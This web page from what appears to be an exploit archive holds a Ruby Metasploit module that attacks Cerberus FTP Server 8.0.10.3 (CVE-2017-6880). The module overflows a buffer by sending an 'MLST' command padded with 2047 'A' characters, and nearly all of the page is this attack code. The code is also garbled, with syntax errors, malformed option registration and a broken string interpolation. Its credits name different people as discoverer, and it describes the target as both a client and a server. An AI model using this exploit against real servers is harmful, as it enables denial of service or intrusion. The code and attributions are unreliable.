Home / os / winmobile

Cerberus FTP 8.0.10.3 MLST Buffer Overflow

Posted on 16 May 2017

#!/usr/share/ruby #[+] Title: Cerberus FTP Server 8.0.10.3 a 'MLST' Remote Buffer Overflow #[+] Credits / Discovery: Nassim Asrir #[+] Author Contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/ #[+] Metasploit Module Author : Souhardya Sardar #[+] Metasploit Module Author Contact: github.com/Souhardya | Souhardya.sardar@protonmail.com #[+] Author Company: Henceforth #[+] CVE: CVE-2017-6880 #Vendor: #=============== # #https://www.cerberusftp.com/ #Download: #=========== # #https://www.cerberusftp.com/files/CerberusInstall.exe (32-Bit) #Vulnerability Type: #=================== # #Remote Buffer Overflow. # ---------------------------- # Module Dependencies/requires # ---------------------------- require 'msf/core' # ---------------------------------- # Metasploit Class name and includes # ---------------------------------- class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp # ----------------------------------------- # Initialize information # ----------------------------------------- def initialize(info = {}) super(update_info(info, 'Name' => 'Cerber FTP Remote Buffer Overflow ', 'Description' => %q{ This module exploits a buffer overflow in the Cerber FTP client that is triggered by sending a bad char "A" in the command "MLST" (2047) . }, 'Author' => [ 'Module Author And Bug Discovered by : Peter Baris', 'Coded by : Souhardya Sardar (github.com/Souhardya)', #metasploit module :) 'Thanks to : Nidhish Pandya ', #auditing:) ], 'License' => NONE, 'Platform' => ['win'] 'References' => [ [ 'CVE', 'CVE-2017-6880' ], [ Reference code taken from original POC located here :- https://www.exploit-db.com/exploits/41620/ ] ])) register_optionsOptPort.new('SRVPORT', [true, "The remote FTP server port", 21]) ], self.class) deregister_options('FTPUSER', 'FTPPASS') end def exploit connect payload = "A"*2047 print_status("Trying to connect to target server {target.name...") sock.put('MLST ' + payload + ' ') handler disconnect end end

 

TOP